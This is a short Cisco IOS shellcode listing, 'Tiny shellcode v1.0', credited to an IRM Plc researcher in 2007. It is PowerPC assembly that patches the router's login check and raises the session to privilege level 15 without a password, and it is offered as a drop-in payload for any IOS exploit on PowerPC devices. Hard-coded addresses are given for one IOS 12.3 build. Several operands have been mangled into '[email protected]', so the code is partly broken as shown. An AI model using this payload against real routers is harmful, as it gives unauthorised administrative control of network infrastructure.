Cisco IOS - Tiny shellcode v1.0

# ----------------------------------------------------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# ----------------------------------------------------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# 
#
# The following two hard-coded addresses must be located for the target IOS version. 
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# ----------------------------------------------------------------------------------------
.equ ret, 0x804a42e8
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# ----------------------------------------------------------------------------------------

main:

	# login patch begin
	lis 9, [email protected]
	la 9, [email protected](9)
	li 8,0
	stw 8, 0(9)
	# login patch end

	# priv patch begin
	lis 9, [email protected]
	la 9, [email protected](9)
	lis 8, [email protected]
	la 8, [email protected](8)
	stw 8, 0(9)
	# priv patch end 
	
	# exit code
      lis     10, [email protected]
      addi    4, 10, [email protected]
      mtctr   4
      bctrl